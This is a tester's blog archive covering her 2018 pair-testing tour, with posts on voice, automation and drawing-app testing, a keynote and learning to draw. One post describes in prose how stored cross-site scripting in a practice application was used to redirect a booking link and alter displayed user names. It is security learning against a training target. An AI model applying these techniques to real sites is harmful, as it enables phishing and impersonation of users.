Wednesday, October 31, 2018

My Testing Tour 2018 - A Challenge Worth Tackling

My testing tour officially ended today. Now it's time to reflect, gather lessons learned, and draw a conclusion.

Probing

My challenge was to become a better skilled tester. Inspired by a lot of people around me, I came up with a hypothesis and designed an experiment, or rather a probe, to test it. I decided to go on a testing tour in 2018, from January until end of October. I paired with many different people, from other teams of my company as well as our global community, to learn with and from each other. Some sessions were collocated, most of them remote, they took at least 90 minutes each and afterwards I blogged about our lessons learned.

Amazing People

In the end I did 25 pair testing sessions with 22 awesome people within 10 months. I'm still speechless when it comes to these figures. However, it's not about figures, it's about the amazing people who joined me on my journey. We learned so much with and from each other, together. These people were key to success of the story, so here is a list of everyone I paired with in the order of their appearance on the tour.
  1. Maaret Pyhäjärvi
  2. Thiago Amanajás
  3. Dianë Xhymshiti
  4. Lisa Crispin
  5. Pranav KS
  6. Peter Kofler
  7. Viv Richards
  8. Cassandra H. Leung
  9. Alex Schladebeck
  10. Viktorija Manevska
  11. João Proença
  12. Mirjana Andovska
  13. Toyer Mamoojee
  14. Thomas Rinke
  15. Simon Berner
  16. Amitai Schleier
  17. Guna Petrova
  18. Claire Reckless
  19. Alex de los Reyes
  20. Rachel Kibler
  21. Marianne Duijst
  22. Gem Hill
If you are on this list, thank you so much for giving this learning experiment a try, for sharing your knowledge, for maybe getting out of your comfort zone yourself, and last but not least for having fun together. Without you the tour would not have happened. I cannot thank you enough for this great experience!

There were further people who agreed to pair up for testing, however, unfortunately we could not find time to do so this year. Some day I'd like to catch up on that in case you're still up for it!
The same goes for all the people who had a place on the tour and expressed interest in having further sessions. And there are so many more people to learn from. I'm sure more opportunities will come to do so.

Lessons about Pairing & the Tour

If you're interested about the actual testing lessons learned on each stop, you will find them in each single post. When it comes to collaboration, I found that I personally prefer the strong-style approach to pairing with frequent rotations of navigator and driver roles. In my experience this set us up for sharing implicit knowledge, building up on each other's ideas and in general smooth collaboration right from the start; especially if I had never paired with that person before.

In general, the following things became clear to me on this tour.
  • The concept of accountability and learning partners works for me. We are probably able to do most things on our own, it might just take more time. The problem is that we often simply don't do them on our own; together, we actually do. You don‘t want to disappoint your pairing partner, right?
  • Make it safe. Having one person share vulnerabilities or fears in the beginning of a session makes it safe for the pair to open up as well. I've witnessed this in several of our sessions. The thing is, I am always nervous in the beginning as well. Some people considered me to be a sort of "expert" - quite the opposite! I'm here to learn myself.
  • More ideas, faster. Pairing up was invaluable to generate ideas what the problem could be and what to try next to solve it. As pairs we could nicely complement each other and built upon each other's ideas. We nearly never got stuck or wasted any time thinking what we could do next.
  • Implicit knowledge becomes obvious. The best example here was my first stop with Peter. At first, we both thought we knew nearly nothing about security testing, and then we realized we indeed did know a lot more than we thought we knew. Often people don't see which kind of value they can provide, for example when pairing with developers to write unit tests. However, there's always something to be shared, always something to offer. Every single piece of knowledge, tip or insight helps us testing.
  • Give yourself time to learn. Diving into a huge topic or new domain takes time. Doing further sessions to go deeper or focusing on very small, dedicated areas might have helped here.
  • Diversity challenges our own understanding. And it's about creating a shared one! A diverse pair will contribute different thoughts and viewpoints, it will make you think. Also, there is nothing too basic to pair on, both can always learn something from each other.
  • Collocation is not a requirement but an excuse. I learned this from Maaret and Toyer, and the tour proved it once again. Remote pair testing sessions can go very smoothly. You can even benefit from geographical dispersal because it increases chances that you get a more diverse perspective.

Did it work?

Well, am I a better skilled tester now? Could I prove my hypothesis? Coming back to this, I did pair indeed, on hands-on exploration and automation along more specialized topics, and I got at least one insight out of each session. Therefore, I succeeded. So I can indeed say: yes, I am a better skilled tester now. At least, I‘m better than yesterday!
  • I have practiced testing a lot more than before.
  • I increased my knowledge around areas new to me like accessibility.
  • I have a lot more tools in my tool belt now.
  • I learned what I know and what I don‘t know, where I need to practice more.
  • And as a side-effect: I enlarged my network and therefore increased my access to knowledge.
In retrospect, it was worth it. I’m happy I chose this adventure. Is it still scary to pair with other people? Yes it is, but a lot less! I'm now feeling way more comfortable to just learn with people, leaving my personal fears aside. „If it‘s scary, do it more often“, right?

My testing tour is now officially over. Still, I really consider to keep the offer to pair test remotely. I might choose a more narrow focus next time. Maybe have more sessions with testers of my company's internal community, or with developers of other teams. Would love to find people to mob with! I could also continue with persons who had been on my tour and go deeper on the same topic. There are many options to choose from.

The Next Challenge

End of 2016, I made a pact with my learning and accountability partner Toyer Mamoojee to help each other out of our comfort zones and tackle our fear of public speaking in 2017. This worked out so well that we decided to go for another challenge in 2018, which was in my case this testing tour. You might have noticed how successful this was for me, as well. I even had the chance to talk about my tour at two conferences already, CAST and SwanseaCon. The best part of sharing my story was that I managed to inspire other people to give these kind of experiments a try as well! I'm already looking forward to give my talk again at TestBash Brighton next year.

The big question for me now is: what will be my personal challenge for 2019? What I know is that there will be another challenge. I'm already eager to tackle it and super curious to see its outcome. Indeed, I already brainstormed several topics and ideas, again based on my fears nowadays. However, there's one important thing I learned from my testing tour that I really have to consider: whatever my next challenge will be, it cannot be as time-consuming as my testing tour this year. Especially as I continued my public speaking challenge as well at the same time. I did not track exact numbers but I estimate the following time effort per session: 2 hours for preparation and communication upfront, 2 hours for each session, 1 hour for writing down my notes, and 3 hours per blog post. And that calculation would only hold for the second half of sessions where I already knew what needed to be done and how everything went. Just considering these figures, I invested 8 hours per session. Times 25 sessions... Well, you can do the math. 200 hours in 10 months is a huge investment. On top of that I know I spent even more hours to come up with the concept, to prepare the tour, to research tools and target applications, to improve the sessions as the tour went on, and so on. Long story cut short: my next challenge needs to be more flexible and less time-consuming.

In any case I am determined to give myself time to rest first, and then some more time to explore options before I finally decide on my challenge. Whatever it will be, it already helps to know that I will get feedback, support and encouragement. I can rely on my learning partnership with Toyer. I will get the backing from our extended pact group together with João and Diane. I will receive feedback from the even bigger power learning group we kicked off this year. And not to forget my newly increased network and the communities I am so glad to be part of. I consider myself really lucky to have so many amazing people around me. No matter what my new challenge will be, I'm already looking forward to where my journey will lead me next!

Tuesday, October 30, 2018

Testing Tour Stop #25: Pair Penetration Testing with Peter

Just a few days before my testing tour is coming to an official end, I had my final stop with Peter Kofler.
We had two sessions on my tour already together which makes Peter the only one I had the pleasure of pairing with three times. In all three sessions we tackled different security testing challenges, each time using Dan Billing’s Ticket Magpie as our target. The first time we focused on exploring the application using SQL injection. The second time we tried automating SQL injections. This time we planned to have a closer look at cross-site scripting (XSS) and see what fake content we could place.

Starting Out

In the beginning of our session, we looked for potential input fields where we could give cross-site scripting a try. We registered as new user and found a comment field on each offered concert. We added a comment containing an HTML tag to see whether this was allowed, and it was. We went ahead and added a simple script that should show up an alert. Interestingly, the Chrome browser considered this a potential cross-site scripting attempt and blocked it showing the error code "ERR_BLOCKED_BY_XSS_AUDITOR". Navigating again to the concerned page, however, indeed showed us the desired alert.

As we had already proven that the application was vulnerable to cross-site scripting, we considered to try out actual scenarios. What if we changed the link of the button to book a concert to lure the user to a different site? We used our JavaScript knowledge and tried out how to target the desired elements in Chrome's Dev Tools console until we had the right command. We added the script in our comment and this worked just fine!

What about posting comments in the name of another user? This was even easier than considered, we found the user name to be a hidden field of the form so we could simply change it using DevTools before submitting the comment. Tampering with web parameters was not our goal, so we decided to inject a script to change already existing user names. We found out how to select the desired elements to change, submitted our comment including the script, and all targeted user names got replaced. However, we found it did not work when adding a new comment in the name of the targeted user. Right, the script had already been executed at that point in time. So we changed the implementation to be executed only when the DOM content had been fully loaded. It still didn't work, but why? The console showed us that an error was thrown. What was wrong with our script? After spending some time on debugging we realized it might just be a copy and paste error, we might have copied some non-ASCII text from a website sample. We sanitized our code - and now it worked!

All this was surprisingly easy, so we still had some time left which we spent on brainstorming what else we might try on our current target practice application or what we in general would want to learn more about.
One of the best resources to get an overview on the most critical web application security risks alongside further resources are still the OWASP Top 10.

Looking Back

We were really successful with our attempts. Frustration was kept at a minimum, not everything worked at once but we made it work together. This was great for learning. However, it felt quite easy as well. This might have been due to the fact that both Peter and me complemented each other very well regarding our knowledge. Peter contributed most of the JavaScript knowledge where I lacked a lot of practice, and I was fluent with the Chrome DevTools that he never used as pure backend developer.

Time flew by and collaboration was smooth. The only thing we noticed: it was not easy for me to not see Peter's screen. I could not see when he shifted his focus away from the shared screen to his screen in order to research useful resources. Though this style had worked in previous sessions for us, we considered we would try researching together and sharing screen control in a future session. Would we have a future session? Well, the whole area of security testing is still really interesting for both of us so we might go deeper together on this topic outside of my testing tour.

This was the last stop on my testing tour in 2018. I aimed for ten pair testing sessions in ten months and ended up with 25. I am still amazed by this awesome learning journey together with so many amazing people. My final task to conclude the tour is to take time and reflect on it as whole, so stay tuned!

Tuesday, October 23, 2018

Testing Tour Stop #24: Pair Exploring Voice Experiences with Gem

At this stop of my testing tour I had the honor to pair test with Gem Hill. I got to know her as active podcaster and enjoyed listening to several of the already 100 episodes of Let's Talk About Tests Baby. This year, I had the pleasure to meet Gem in person for the first time at SwanseaCon. We had attended each other's talks, and right after she heard me speaking about my testing tour she scheduled a session with me!
Gem shared with me that she also experienced a pair testing session with Maaret Pyhäjärvi, just like I did on my very first tour stop. She even did a full podcast episode about it, which I can only highly recommend! Since I've met Gem, I was looking forward to our pair testing session. With good reason, I learned a bunch.

Test Setup

Gem proposed to pair test on voice experiences. As we paired remotely we agreed to use a simulator instead of a real device for testing. My experiences with voice apps are very limited, they narrow down to a simple learning project during one of my company's hackrdays last year. Also, I am not a user of voice apps myself. Therefore, I was eagerly looking forward to our session. Some interesting blog posts I came across during preparation were the following.
Gem kindly agreed to prepare a test setup. As she is currently working on voice apps at the BBC, she suggested to tackle the BBC Alexa skill which is basically a player for all BBC radio stations and podcasts. We used the Alexa Simulator and the latest released skill version, publicly available for everyone.

Challenges of Testing Voice Applications

At first, we checked the happy path to start the app and play a radio channel or podcast. Just by doing so, we discovered that the audio player functionality showed issues. Instead of playing the requested source, it triggered a warning that "AudioPlayer is currently an unsupported namespace". Interestingly, the warning message box was not completely displayed on our screen. Well, we're not testing Amazon's services here. Checking later, I found that this is a known limitation of the simulator and audio playback would work on a real device.

Then we tried to change from one radio station to another one and stumbled again. Asking to "switch" to another station opened another skill, TuneIn, attempting to play the requested station there. Unexpected and not desired! We thought maybe native speakers would not say "switch", but rather "change"; however, this command was unknown. What about "go to"? Again, we switched skills. Interestingly, the feature to switch stations is indeed advertised in the skill description.

Let's try to ask for the news, a use case we deemed quite common when thinking about radio stations. To our surprise, the player started the podcast "Breaking the news". Seems a synonym had been stored for "the news". Hm, what about only "news"? The skill told us that this radio station was unknown. We tried "weather" instead, another common information you might expect to get from a radio station. To our surprise, the skill answered with "I can't do that". Strange, we thought if the request was unknown it would fall back to the "unknown radio station" case. We tried "cheese", which again was interpreted as unknown radio station, just as expected. To test the simulator a bit, we tried a clearly misspelled input, "ra7dio 0n3", and this got recognized as unknown podcast now. But why? We tried several cases, using written words as well as voice input, however, we could not determine why the skill reacted in three different ways to unknown input values.

We looked at the JSON input and output the simulator showed us. Everything looked good here. So we moved on and tried different languages, like asking for the Welsh radio station "nan Gàidheal". The skill understood "nine gale" and asked "Should I play nine gale?" Yet another response we hadn't triggered before! We confirmed, and the skill answered that it couldn't find the station and included a long error message within the response. Interesting finding! However, it was again caused by the simulator and not a real-life example. We used written input, and the API could not deal with the special character included, which would simply not happen when using voice input.

We tried a few more things like seeing whether the station "WM 95.6" got recognized when pronouncing the "." as "point" as well as "dot", or only using "WM". All worked. We tried similarly pronounced words and unclear mumbling to see whether one could be mapped to a station. There were many more options we did not try, like checking any customer reviews on the skill, which in themselves provided lots of useful input for testing.

Throughout our session, Gem shared bits and pieces of wisdom when it comes to testing voice apps.
  • The simulator and real devices behave very differently, so normally they always test on real devices. Furthermore, the simulator is way slower than real devices; another reason to use the latter.
  • They do lots of API testing, checking the JSON output, to ensure the implemented functionality is working as expected.
  • They learned how to test efficiently. Why? Well, when you explore without automation you have to listen to the skill welcome and introduction text again and again and again and again... This does not only take a lot of time, it is also very quickly annoying. Very. Quickly. So, exploratory testing without automation can indeed by very inefficient in this case so they try to automate as much as possible on API level.
  • As the team got more and more mature, they now started to think more and more about how to increase testability. With all automation in place, you still have to test with the real devices as it's the only way to get the real experience.
  • It is really hard to design voice experiences. For example, you have no idea whether you have a very experienced user who might get annoyed by having to listen to too much navigation, or a newbie, who simply needs more instructions.
  • Always ask yourself: Are you still testing the skill, or already the device? Testing the device does not make sense, we can't change it anyways. Going through the list of things users actually say and what Alexa understands, however, does make sense as it allows you to add those as synonyms and make the skill more user-friendly.

Retro Time

We quickly found ourselves at the end of our 90 minutes time box. Gem felt the session went very well, using Zoom to share screen control was amazing, she had lots of fun and the time flew by. For another session she would spend more time in the children's skill BBC offered as it had more branching narratives.

For me the session was awesome, Gem provided a perfect test setup for us to practice. I agreed that a more complex skill would be interesting, however, it was also nice to start with such a "basic" skill as the radio player. This challenged us to come up with good test ideas and we still found issues for such a basic skill. I really appreciated Gem for sharing her knowledge with me, I learned a lot in our session and my respect for people designing and testing voice experiences grew even further. Gem shared it's a real challenge and they are learning something new every day. By the way, a fun fact I learned today: both of us are normally listening to audiobooks when at home! It was a real pleasure testing with Gem and I'm already looking forward to seeing her again in real life.

End of October, the end of my experiment, is getting closer. This was the second last stop on my testing tour 2018. One more to go, so stay tuned!

Wednesday, October 17, 2018

Testing Tour Stop #23: Pair Automating with Marianne

When Marianne Duijst scheduled a pair testing session with me, I was super excited. The last time we met each other in real life was at CAST, and it was a real pleasure. Just as this testing tour stop!

Preparation Phase

Both Marianne and I love to explore, however, for our learning session we chose to practice automation together so we both can improve in this area. We wanted to have a basic setup to start from so we both looked for projects that suited our needs. We considered especially the following options.
Before our session, I had a closer look on each of those options. I got all running and checked whether I could extend them without too much hassle in an easy way. Getting back to Marianne with my results, we decided to give the BDD Trader application a try, as testing against an API was something that appealed to both of us. Marianne found that all the courses and workshops usually work on UI level, not on API. As she is coming from data warehouse testing she felt this would be fun and educational to do.

Combining Technical Skills and Domain Knowledge for the Win

At the beginning of our session I introduced Marianne to what I already knew about the BDD Trader application. Our starting point was the project's readme which included explanations about the application domain. In a nutshell, the product allowed users to buy and sell shares using real market data.

As we had agreed in advance, we paired the strong-style way, using my usual suspect of a mob timer. We started the application and verified it was running. We decided to follow the provided exercises, allowing us to get to know the application and already existing tests.

The first part of our session was mainly taking instructions, copying and pasting code. This task was not challenging, however, it gave us time to familiarize ourselves with a few things.
  • We got an overview of the application and a first set of its capabilities.
  • We gained a shared understanding of the diverse knowledge and experience we bring in to the pair as persons. I could introduce Marianne to some technical and tooling topics like IntelliJ as IDE or Cucumber. Marianne, on the other hand, had worked in the financial sector for banks and could introduce me to the domain of trading stocks I knew so little about.
  • We found how to setup our working environment to level our playing field. Marianne shared that she was color-blind, so the IDE coloring problems like missing class imports in red font was not helpful. Therefore we adjusted IntelliJ's colors for red-green color vision deficiency which at least improved the situation. It's easy to forget we don't all share the same access to technology while it's super important to make it as easy as possible for all of us.
  • We learned how the scenarios had been put together, how to make them pass and how to make them fail as well, which was just as crucial as getting them running.
While following the exercises, we found two issues with the provided documentation.
  1. One code snippet contained numbers like "(1)" that were used as references to explain what was happening at each step further on in the documentation. However, these should have been commented out to allow easier copying and pasting.
  2. Two other code snippets included a method expecting a parameter of type Long, but when the method was called an Integer was passed.
Both issues easy to fix, however, they made us realize we had fallen into the copy and paste trap. We had not given one thought whether we should automate the provided scenarios at all, where the risks of the product really were, and so on; things that you would normally start with. While noting this, we accepted it for the sake of our learning purpose for this session.

When we tackled the task of implementing variations on our current scenarios, it got really interesting on a completely different level. Now our thinking skills were in high demand. By adding our own scenarios and adapting their parameters we explored not only how the tests were implemented, but also how the product behaved. For example, we found that we were not allowed to spend more than we had in our account; and kept in mind that we would add a test for this.

One scenario caused us quite some headaches. We wanted to verify the product behavior when a registered user made losses on multiple shares. At first we questioned what was really meant by profit here. We tried different parameter values, and the test failed. We noticed we had forgotten to adapt further parameters and changed those as well. However, the scenario kept failing. We commented out all other scenarios of the feature just to be sure there was no dependency. This way our focus fell on the background for all scenarios, providing us details about the test data setup we had missed before. We struggled with identifying the correct data in the data table we used, so we provided the expected values from the error message output, without understanding why - and the test passed. Only then we finally saw which pieces of the jigsaw puzzle we had missed and realized why they were - of course - needed!

Ending Happy

We decided to stop here in a green state and reflect. I felt this whole setup mimicked the case that you join a new team and look at an already existing product with already existing test automation. We were trying to figure out what we saw. We were sharing knowledge about the tooling used. We were aiming to get on common ground regarding the domain knowledge required. And in the end we knew why! Alone we would have sat a lot longer, asking ourselves this question again and again, from different angles. Combining our knowledge was the key here.

Marianne shared it was great to experiment in this way. She felt she was still at a position where coping with all new things at once would have been too overwhelming for her: the IDE, the provided code, the libraries, etc. But she really liked thinking about the logical problem. We made a perfect match here, as from time to time I felt so dumb, having a hard time understanding financial domain topics although I felt I should easily grasp those concepts. Marianne caught me here before I got too frustrated with my own lacking. Where Marianne was happy to get navigated through technical details and tools and having someone else generating ideas from this perspective, I was super happy to have someone being able to make informed assumptions about the domain and the related product behavior that we could verify.

Sometimes people having expertise in certain areas, be it technical or domain oriented or anything else, are tempted to rush ahead and inevitably lose pairing partners that "don't get it"(yet). This is where strong-style pairing can make such a difference. Using this approach we have to express our thoughts and ideas, we navigate each other through parts we don't know yet, and we have to explain concepts otherwise the other one would not be able to navigate next. Doing it together, we both got farther than we would have on our own and learned from each other at the same time. To say it with Marianne's words: "This was so cool."

We ended happy, and I'm even happier to meet Marianne again in person at Agile Testing Days in just a few weeks. Her awesome "Sketchnoting Adventures" workshop is definitely on my list of favorites, and I heard there's still a chance to get yourself one step out of your own comfort zone and give an agile unicorn talk!

Saturday, October 13, 2018

Testing Tour Stop #22: Pair Exploring an Online Drawing Application with Rachel

In the original experiment design for my testing tour, I aimed for doing ten stops from beginning of 2018 until end of October. Now, getting closer to this deadline, I realized the community reception was a lot better than expected so that I even had to limit my number of sessions. And suddenly, only one slot was left, one more potential day I could make time. A few more stops would come afterwards, but this was a potential gap in my calendar. I considered asking either specific persons or in general asking around on Twitter if anyone wanted to grab that slot; but then decided to test this out, to wait and see if someone would go for it themselves. Turned out this was a great decision, as Rachel Kibler reached out and filled the gap!
I met Rachel at CAST earlier this year. I attended her mobile and chatbot testing workshop which raised my awareness to a lot of things to look out for, what can go wrong, what are specific problems in the those areas. She also attended my talk about this testing tour, and wrote some very kind words about it, concluding with "Now I want to do the same. There’s so much to learn!"

I'm really happy Rachel seized the opportunity, we had a great pair testing session together!

Getting Started

In the beginning of our session, Rachel shared she was pair testing with Maaret Pyhäjärvi only two days ago and it got her hyped up! I could really relate to that as I had my first testing tour stop with Maaret. If you're reading this, and you haven't tried it yourself so far: Maaret is wonderful and pair testing with her amazingly enlightening. She really has the gift of feedback.

Rachel and I decided to go for Sketchpad, an online drawing application. I had offered it as potential test target to several of my previous pair testing partners before, however, they always ended up choosing a different option. Therefore I was happy Rachel now picked up this app! None of us knew it, so we started from a level playing field.

Rachel was happy with strong-style pairing, so I set my usual mob timer to the usual four minutes and off we went.

What a surprise!

We decided to first see what the application offers. We started broad to get an overview first and then to make an informed decision where to dive deeper into. Here's how the session went.
  • We opened the application and started to draw something on the empty canvas. The calligraphy brush was active by default and we used it to create a closed form. We wanted to fill it and found nice gradient fill options. How to use those was not completely obvious, but after realizing we had to increase opacity and these settings were only used for new elements to instantly fill them, we created a nice new gradient-filled form.
  • We went further and found we could also create stars, in different sizes and rotations. The application made it easy to resize elements or rotate them, providing live information about width, height, angle and offering guiding lines for positioning in relation to the other elements. Our first impression a few minutes in: this product looks quite nifty!
  • What about adding a text element? Here we go. Let's add a new line - hm, why is the cursor blinking in the middle of our first line? Let's write something more - the new text appeared in a new line, having the font size automatically decreased to fit all text into the box. Well, you can like it or not.
  • Let's see what the emoji tab offers. Oh, it's about adding cliparts. By the way, the smiley icon for this tab looked quite scary. Okay, we can add a cartoon cow to our canvas. Let's add a different one, the penguin looks cute! Choosing it not only selected it as our clipart, but also instantly placed a huge instance of it on our canvas. Didn't like that so much. We placed more of them - and one appeared as a tiny splotch. Strange.
  • There's another tab, offering a filling option. Now we assumed to be able to fill single elements. However, it seemed we hit the background instead of a single element, as everything got filled! (Going back to this later, it seemed something went wrong when initially trying to fill an element, as this is indeed feasible.) We discovered a nice feature: We had selected another gradient filling option, a rainbow pattern, and now could even define where which color started.
  • Now what about those elements on our canvas. Do they offer a context menu? Indeed! But why does it offer to copy all? Trying it out, we found all elements got selected. Only later we realized we had triggered the context menu for the background which offered different options than the menu for single elements. We re-encountered this issue several times later on in our session, which proved to be quite annoying. It occurred when we already hovered over the element and clicked without that the element frame was displayed already.
  • Next to the context menu options, the related shortcut was displayed. However, it was the shortcut for macOS, although we tested on a Windows laptop! Did they only implement the Mac version? Or maybe the detection of the operating system failed?
  • We had noticed we could move elements over each other. The element context menu offered to change the layer, sending elements completely to the back or front, or doing so stepwise. We found that sending an element one layer backwards did not have any impact. Maybe each element represented one layer so we just could not see the effect? We checked the layer view and found this assumption to be true, but still the sending backwards feature was broken. Checking the console later it showed a warning from raven.js was thrown: "Unhandled rejection (<{"message":"Tool not found."}>, no stack trace)". Not nice.
  • The element context menu also offered to create a stamp out of the given element. Doing so, displayed the form as new stamp brush in the toolbox - however, with inverted colors! This came really unexpected. Later I found this was due to the dark theme set by default.
  • We added our new custom stamp to the canvas. The next surprise! Not our form was created, but a gray rectangle - why? We tried to create another custom stamp - and suddenly this worked as expected. Hm. What was different? We came up with several theories and assumptions, trying out combinations of what we had done before, but could not reproduce the issue. And yet, we had the evidence on the canvas that something went wrong here.
  • Maybe only the very first custom stamp did not work? Let's start a new drawing from scratch. To do so, what if we simply reloaded the page? To our surprise, our previous drawing was not lost but still displayed! But the URL did not show any identifier and we were not logged in. We checked the application tab in the Chrome DevTools and found that a cookie had been stored as well as several values in the local storage. We cleared them all, reloaded the page and found ourselves on a clean canvas. We created some new elements as well as a new custom stamp from them, and now the stamp brush worked as expected from the beginning.
  • Keeping the DevTools open showing the console, we found several warnings to be thrown; something to look into in a separate session.
  • We decided to go deeper on stamps and tried different configurations. What surprised from user point of view was that when dragging the stamps brush, the single stamp instances were of different size. We found that the brush was set to a range of potential sizes by default. Maybe to make this feature discoverable? Would be interesting to learn about the algorithm behind how the size is calculated.
  • We tried further stamp settings. The offset setting behaved quite understandable. Each of those settings offered a bar to set values in a visual way. Dragging the handle, we got a live preview of the effect the new value would have. Besides for the spacing setting! We found that only for smaller ranges the preview got triggered, but failed to understand why not for larger ones.
  • The rotation setting was even better. Suddenly we had dragged the handle for the minimum value farther to the right than the handle for the maximum value, inverting the displayed range! Okay, for rotation this might make sense, but we would not have expected this and the other settings did not allow it either.
  • The bar of the size setting offered a fixed minimum and maximum value but also provided a field to enter a specific one, which simply asked for trying values higher than maximum, lower than minimum, zero and negative values. The application dealt with it without producing errors, using only the limits. But the interface still accepted the incorrect value when clicking outside the field. A very tiny red bar appeared to show the value was not valid, but that was easy to get ignored.
  • We felt we spent enough time around stamps and set off to something different: the history tab. All our actions were listed and enumerated, the latest one on top. Hovering over the entries, we found the tooltip say "The past". The current entry was "Now". Clicking on a past record, the ones farther on top got faded out and said "The future". What a nice way to communicate this!
  • When moving through time, we realized that the redo button in the left sidebar appeared and vanished, seemingly without good reason. We went to the past, the redo appeared. We went a few steps back in the future, not to the beginning, and the redo disappeared. But why? We could have still stepped through all future items by using redo until reaching again our latest status. We went back further into the past, and the redo button got displayed. Clicking on the same entry again, the "Now", the button vanished again!
  • Going back in time, we suddenly had a canvas state where some of our custom stamp brush lines got turned into lines of those gray rectangles instead! Moving through history, we could not make them convert again to our actual ones. We tried to export the drawing to an image, and the gray boxes were exported! We decided to reload the page - and suddenly we had our custom stamp brush line back. Really weird.
  • Back to the history, we wanted to see what happened when we were at a past state and made a change. We wanted to move an element, and a text element got created. Right, the text tool was still selected. Why didn't we see this? We realized that this tool did not change the cursor to provide a hint which tool you currently had selected - like other tools we had tried. Inconsistent and not helpful.
  • We browsed a bit further. Checking the settings dialog we found that an autosave feature was active. Something to look into separately.
  • We went further to open a drawing, expecting to open files we had first exported - but no, to our surprise it offered us the drawings we had previously worked on! Even the one we had created before clearing the local storage. Seemed we missed something. So we went back to the DevTools application tab and found that the drawing information had been stored in the IndexedDB. Nice that users don't lose their drawings; not nice that they are not informed that their drawings fill up the browser's storage. We deleted all entries for one of our images and reloaded the page, and the image was indeed not found, instead opening a new canvas.
  • We opened one of the other images - and got caught by surprise again. The drawing showed several elements in a strange way, cutting them off. And: our wonderful default gray box stamps had reappeared.
We felt this was a good point to stop our session and take a few minutes to reflect.

Looking Back

Rachel found that pairing was awesome for generating ideas. The four minute timer felt just perfect. At one point towards the end she shared she was getting tired and running out of ideas. However, she knew she had to push herself just a bit further so the other one could take over navigating.

She addressed she found it hard to take notes during the session, as even navigating the other one to note something down would have interrupted the flow. I offered the option to take notes together in the beginning but then did not bring it up again. In my recent pair testing sessions I was trying to not enforce my ways on others too much and instead learn about new approaches.

Rachel said the session was fun, and it was great that the navigator could really take the time and focus to observe, having their eyes out. This helped a lot when facing weird behavior.

I found myself hearing us saying lots of things like "wait, what was that, did you see that?", "that was weird", "hmmm" (the sound of frowning), "strange", "ohhh!", "that was unexpected". We made lots of explicit assumptions and also tried to verify them which I really liked.

In general I found it harder to come up with great test ideas for this kind of application that was so different from what I normally tests. I had used lots of drawing applications already, but not having the focus on testing. It was great to try testing something completely different, and it was even better to do it together to generate more and better ideas.

Overall, this product really surprised me. In my previous sessions, the test target quickly showed issues or quirky behavior we frowned upon. This time, the product looked indeed quite nice in the beginning! A positive surprise. Then we started to find issues. More of them. When it finally came to opening existing drawings, the surprise had turned from pleasant to unpleasant. Still, this stop was yet again a fun learning session and I am already looking forward to the last scheduled ones!

Sunday, October 7, 2018

How I Got My First Keynote - Or: Join Me at Testing United 2018!

You might have seen my post about my story as a first time conference speaker. You might also have seen my tweet about my first year as conference speaker (still can't believe the stats of my journey).
You might have seen I got invited to give my first keynote ever!
But - how did it come that I give my first keynote after only 14 months into public speaking?! Truth is, I don't know.

What I know is, that one day in August 2018 I received a message from the Testing United organizers via LinkedIn. It said they had seen one of my talks and like it (I always appreciate feedback!). They thought it would perfectly fit the managerial track for this year's edition of their conference. They even considered that I was already scheduled for another conference, right before theirs - asking whether I could still make time and would like to join them in Bratislava this year.

No word of keynote? Exactly. Don't get me wrong - getting invited to do any session, without having to submit a paper and go through the selection process, and that after only one year of public speaking, is already a golden ticket.

I had a look at their conference page. It indeed sounded interesting, however, I worried it might be too much for me this year (remember I had lots of conferences already done and still on my list back then). I was especially concerned about the timing, as I would be for a full week at another conference just the week before. So I asked them to provide more details via email so I could make a better informed decision. (Postponing decisions has not proven to be the best thing to do in all cases for me; but this time it was.) The email came the very same evening and started as follows.
Good evening Lisi,

As we started our discussion on Linkedin, we would like to invite you to become one of our keynote speakers on Testing United 2018 conference (two days:November 19-20, Bratislava, Slovakia)
I did not read further. Did it say.. keynote?! My first thought: There must have been a mistake, mixing up content and recipient or sorts of. So I asked for clarification and got the following prompt response.
I believe you could make a big talk in front of big crowd (500ppl) :) 
Wow! It was indeed an invitation to give my first keynote ever! I was speechless - and this was too good an opportunity not to seize.

Long story cut short: Join me at Testing United 2018 in Bratislava and support me on my first keynote! Jokes apart, the schedule is out and it looks amazing. I'm looking forward to hearing talks from people I listend to already, like Gojko Adzic. I'm really looking forward to meeting people I only know from social media, like Raluca Morariu, and finally hear them talk! Last but not least, I'm so looking forward to getting inspired by people I didn't know yet and making new connections. One of the secrets that I learned on my public speaking journey so far is, that speakers speak due to many different reasons. But one is very common: to get the opportunity to attend more conferences and learn from each other. I, as a speaker, am there to learn.

Another reason for me is to share my stories and experiences in order to give back to the community. My keynote "Next Stop: FlixBus! A Tester Exploring Developer Land" is exactly about that! Would you like to...
  • ... learn how testing throughout the workflow helps to shorten feedback loops and build quality in?
  • ... find out how to engage the whole team to resolve bottlenecks?
  • ... experiment with different approaches to find solutions in your context?
  • ... get tips to foster cross-team collaboration and grow a company-wide testing community?
  • ... discover how to explore beyond your product to drive continuous improvement?
Then join me at Testing United in Bratislava on November 19th & 20th!

Saturday, October 6, 2018

How Learning to Draw Helps Testing

Or: how I learned to look closely. And then even closer.

Today I attended the Growth Mindset meetup here in Munich. They were hosting a "You can learn everything! Like drawing" workshop and it made me realize that I had received lots of training in the past how to look closely. As our facilitator shared, learning to draw is not about training your hand, it's about learning to see, like an artist. It's about perceiving your surroundings, the things, everything - as they are. Neither to add nor to omit anything.

My original intention to attend the workshop was to challenge myself to pick up drawing again. The first half of my life I loved drawing. I took art as intensive course back at school. I even considered to study art. But then I got frustrated and lost all motivation.

So, back then I had quite decent drawing skills; not overwhelmingly awesome, but good. Then I left drawing behind me for years. From time to time, I halfheartedly tried to pick it up again and got quickly frustrated by the results - and dropped it again. Why? Because I instantly compared them to my level back then, neglecting the fact that I had been training drawing every - single - day, putting in many hours.

When I started to work I had to establish a growth mindset to learn so many things I've never done before. With all the things I learned ever since, I thought maybe I could use that new knowledge and experience to re-trigger the drawing topic. To discover the fun again. To practice the patience it requires. To train my eye for detail. There's a time for letting things be "good enough", and there's a time for not being satisfied with that. In any case, I would train my right brain half.

And it worked! I suddenly looked forward to this five hour workshop, taking place on a Saturday morning (not my usual time). The first hours triggered so many memories about the training I received.  Also, my first drawings after a long time were not so bad after all (I had expected them to be worse). All looking bright? Unfortunately not. The problem started when coming to the end of the workshop and our final drawing. This was the time my brain interfered again, telling me "my drawing should be better". That "I should be better". I did not manage to shut it up.

My lesson: I am on a good way to train my growth mindset further, in further areas, also in areas I thought I had left behind. Still, there's much more work to do and effort to put in. It's the same as with every skill, like drawing - also the growth mindset itself has to be continuously trained and honed. Next time I hope I can keep my brain from interfering - a bit longer.

Friday, October 5, 2018

Testing Tour Stop #21: Pair Accessibility Testing with Alex

